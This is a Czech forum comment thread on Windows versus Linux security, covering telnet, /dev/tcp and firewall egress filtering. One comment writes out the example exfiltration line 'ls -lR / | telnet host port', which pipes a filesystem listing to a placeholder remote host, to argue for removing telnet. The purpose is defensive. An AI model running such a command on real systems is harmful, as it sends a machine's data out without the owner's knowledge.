Názory k článku
Kontroverzní zpráva o bezpečnějších Windows
-
emko (neregistrovaný)Ja mam na bezpecnost windows vlastni nazor. Uz jenom to, ze neni tak tezke projit windowsovskym firewallem nebo to, ze v Outlook Expresu (e-mailovy klient integrovany do woken) je rutina, ktera umozni posilat maily bez vedomi uzivatele, je dost na povazenou. Rovnez se mi nestalo, ze by nejaky linuxovy explorer skryval pripony souboru.
-
#Tom (neregistrovaný)Výhoda Linuxu je v tom, že je každej jinej. Ve většině Linuxů je, podobně jako ve většině Unixů, třeba 'ls', 'rm', 'cp' atd., ale už ne třeba 'telnet' (v nouzi poslouží jako náhrada netcatu), 'wget' (skriptovatelné stahovadlo), nebo výše uvedenej 'mail'. Já používám kombinaci Fetchmail+ESMTP+Pine, ani 'sendmail', ani 'mail' nemám na skladě. (Leda že bych chtěl spamovat :) Za to wokna jsou všecky stejný, ke všem se vnucuje ten Outlook už při instalaci. Aspoň že ho nepoužívají všichni. Je ale pravda, že přítomnost telnetovýho klienta může být při spuštění škodlivýho skriptu docela pořádná díra...
ls -lR / | telnet host port
Takže paranoici nechť si smažou telnet :) -
#Tom (neregistrovaný)Přesně tak. Jde třeba o to, jestli je potřeba mít v systému tu či onu součást - třeba FTP server, nebo raději přenos souborů přes SSH atd. Mimochodem, sem spadá i /dev/tcp. Mít, či nemít? Právě jsem si prošel pár počítačů a vyhrabal jsem to až na IRIXu... Tam to asi bylo předinstalovaný, jinde naštěstí ne...
-
Kit (neregistrovaný)Proč naštěstí? Povolit/nepovolit komunikaci je přece záležitostí firewallu ne? Můžu odstranit /dev/tcp, můžu odstranit telnet, ale stále nemám jistotu, že se mi v systému nenachází program, který odešle nějaká data ven. Stačí, pokud si některý z uživatelů stáhne nebo napíše komunikační program a jsi tam, kde jsi byl, než jsi odstranil telnet a /dev/tcp.
Pokud potřebuješ blokovat příchozí/odchozí/průchozí komunikaci, udělej to na firewallu. -
Kit (neregistrovaný)Pichi: #Tom má zřejmě na mysli server a Ty zřejmě pracovní stanici. V obou případech jsou nároky na zabezpečení odlišné. #Tom má potřebu filtrovat i odchozí provoz a to nelze bez firewallu zajistit, protože uživatel může instalovat libovolnou aplikaci, která by mohla navázat spojení a odeslat/přijmout nežádoucí data. Dokonce uživatel může instalovat démona, který bude poslouchat na neprivilegovaných portech. Zamezení takového provozu lze pouze přes firewall.
Na pracovní stanici takové nároky kladeny nejsou. Když si uživatel nainstaluje nějaký malware, tak jsou v ohrožení pouze jeho vlastní data a je to vlastně jeho problém.
Na svém počítači firewall nainstalovaný mám, protože mám pro svou potřebu nainstalováno dost služeb - sshd, Apache, Sambu, MySQL, DNS,... Tyto služby sice mám nakonfigurovány tak, aby poslouchaly pouze na vnitřním rozhraní, ale přesto bych se bez firewallu cítil v ohrožení. Stačí se podívat do jeho logu.
Kromě toho je v Linuxu firewall součástí systému, tak proč toho nevyužít?
